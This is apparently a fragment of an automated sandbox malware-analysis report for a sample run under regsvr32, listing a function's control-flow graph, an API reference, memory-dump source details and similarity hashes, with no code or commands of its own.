                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1251 24f71ec-24f721f 1252 24f7438-24f7452 1251->1252 1253 24f7225-24f7247 call 24ee560 1251->1253 1256 24f7249-24f725d call 24ee560 1253->1256 1257 24f72a4-24f72b6 1253->1257 1256->1257 1268 24f725f-24f7265 1256->1268 1258 24f72bc-24f7300 call 24f1334 1257->1258 1259 24f7453-24f745b call 24ee49c 1257->1259 1258->1252 1267 24f7306-24f7311 1258->1267 1269 24f7318-24f7353 1267->1269 1268->1257 1270 24f7267-24f726d 1268->1270 1271 24f7359-24f7365 1269->1271 1272 24f7417-24f7432 1269->1272 1270->1257 1273 24f726f-24f729e call 24f15d8 1270->1273 1271->1272 1274 24f736b-24f7390 1271->1274 1272->1252 1272->1269 1273->1252 1273->1257 1276 24f73c3-24f73c6 1274->1276 1277 24f7392-24f739e call 24f1468 1274->1277 1276->1272 1280 24f73c8-24f7412 call 24f7118 1276->1280 1283 24f73bb-24f73bc 1277->1283 1284 24f73a0-24f73a3 1277->1284 1280->1272 1283->1276 1285 24f73a5-24f73b1 call 24f1468 1284->1285 1286 24f73b3 1284->1286 1288 24f73b5-24f73b9 1285->1288 1286->1288 1288->1272 1288->1283
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 024F7297
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CallTranslator
                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                                                                                                                                                                                                                                                                                                  • Instruction ID: c3e4cbe0eab8ada18c52ffa91b718d82f5baf51e994775c43004aed6bd6e0cea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5717E30518B488FDBA5EF1CC446BAAB7E0FBD9314F044A5EE589C3211DB78E581CB86